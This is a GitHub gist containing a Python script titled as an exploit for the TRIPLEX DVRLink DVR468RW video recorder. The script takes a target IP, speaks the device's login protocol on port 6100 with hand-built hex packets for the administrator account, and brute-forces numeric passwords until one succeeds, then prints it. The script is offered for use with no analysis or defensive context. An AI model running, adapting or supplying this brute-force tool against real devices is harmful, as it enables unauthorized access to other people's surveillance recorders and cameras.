Created
December 22, 2016 22:27
-
-
Save lanrat/bbdc421247480691a9c4f5427a083667 to your computer and use it in GitHub Desktop.
TRIPLEX DVRLink DVR468RW Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import socket | |
import binascii | |
import sys | |
import time | |
def passList(): | |
n = 1 | |
li = [1] | |
while (int(li[-1]) <= 44444444): | |
k = str_base(int(n)) | |
if (k != 0): | |
li.append(k) | |
n = n + 1 | |
return li | |
def asctohex(string_in): | |
a="" | |
for x in string_in: | |
a = a + ("0"+((hex(ord(x)))[2:]))[-2:] | |
return(a) | |
def getIP(): | |
#Ask for IP | |
while True: | |
TCP_IP = input("Enter IP: ") | |
try: | |
socket.inet_aton(TCP_IP) | |
break | |
except socket.error: | |
print("Error, Try Again") | |
return TCP_IP | |
def connect(to, port): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((to, port)) | |
return s | |
def makePassPacket(password): | |
packet = '41444d494e4953545241544f5200' #14 bytes, username: Admininstrator | |
packet += '0000eb030000920303000000000058d86701' #18 bytes of something... | |
packet += asctohex(password) #4 password | |
packet += '00' | |
size = len(packet) | |
need = 128-size #64 bits in hex | |
junk = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'#bytes of something else | |
packet += junk[0:need] | |
return packet | |
def str_base(num, base=5, numerals = '01234'): | |
if base < 2 or base > len(numerals): | |
raise ValueError("str_base: base must be between 2 and %i" % len(numerals)) | |
result = '' | |
while num: | |
result = numerals[num % (base)] + result | |
num //= base | |
if result.count('0') > 0: | |
return 0 | |
return result | |
TCP_IP = getIP() | |
TCP_PORT = 6100 | |
print('Generating password list..') | |
passwords = passList() | |
print('Running...') | |
msg1=binascii.unhexlify('01010000') | |
msg2=binascii.unhexlify('01010004') | |
msg4=binascii.unhexlify('01200040') | |
for password in passwords: | |
s1 = connect(TCP_IP,TCP_PORT) | |
#socket 1 data 1 | |
s1.send(msg1) | |
s1.settimeout(5) | |
data1 = s1.recv(4) | |
data2 = s1.recv(4) | |
if (binascii.b2a_hex(data1) != b'02000008'): | |
sys.exit("First packet incorect") | |
s2 = connect(TCP_IP,TCP_PORT) | |
#socket 2 data 1 | |
s2.send(msg2) | |
msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8]) | |
s2.send(msg3) | |
s2.settimeout(5) | |
data3 = s2.recv(4) | |
data4 = s2.recv(8) | |
if (binascii.b2a_hex(data3) != b'02000004'): | |
sys.exit("Second packet incorect") | |
#socket 1 data 2 | |
passPacket = makePassPacket(str(password)) | |
s1.send(msg4) | |
s1.send(binascii.unhexlify(passPacket)) | |
data5 = s1.recv(8) | |
data6 = s1.recv(8) | |
if (binascii.b2a_hex(data6) != b'02160000' ): | |
print('Password:',password) | |
sys.exit() | |
time.sleep(0.1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment